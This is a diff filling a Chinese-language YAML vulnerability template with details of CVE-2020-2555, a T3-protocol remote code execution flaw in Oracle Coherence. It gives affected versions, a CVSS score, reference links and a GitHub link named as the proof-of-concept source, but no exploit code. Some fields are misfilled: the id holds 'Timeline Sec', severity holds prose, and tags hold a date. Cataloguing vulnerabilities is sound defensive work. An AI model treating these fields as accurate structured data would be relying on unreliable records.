"a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" +++ "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" @@ -1,19 +1,23 @@ -id: 漏洞编号 -source: 漏洞验证程序来源 +id: Timeline Sec +CVE-2020-2555 +source: https://github.com/wsfengfan/CVE-2020-2555 info: - name: 漏洞软件包简介 - severity: 漏洞危害 + name:Oracle Coherence为Oracle融合中间件中的产品,在WebLogic 12c及以上版本中默认集成到WebLogic安装包中,T3是用于在WebLogic服务器和其他类型的Java程序之间传输信息的协议。 + severity: 攻击者利用该漏洞可实现在目标主机上执行任意代码。使用了Oracle Coherence库的产品受此漏洞影响。 description: | - 漏洞描述 + 该漏洞允许未经身份验证的攻击者通过构造T3网络协议请求进行攻击,成功利用该漏洞可实现在目标主机上执行任意代码。使用了Oracle Coherence库的产品受此漏洞影响,在WebLogic Server 11g Release(10.3.4)及以上版本的安装包中默认集成了Oracle Coherence库。 scope-of-influence: - 漏洞影响范围 + Oracle Coherence 3.7.1.17 + Oracle Coherence 12.1.3.0.0 + Oracle Coherence 12.2.1.3.0 + Oracle Coherence 12.2.1.4.0 reference: - - 漏洞相关链接 + - https://cloud.tencent.com/developer/article/1622124 classification: - cvss-metrics: CVSS:3.1 - cvss-score: 漏洞评分 + cvss-metrics: CVSS:3.0 + cvss-score: Score 9.8 cve-id: cwe-id: cnvd-id: kve-id: - tags: 漏洞标签 \ No newline at end of file + tags: CVE-2020-2555 一月 15, 2020; 12:15:17 下午 -0500 \ No newline at end of file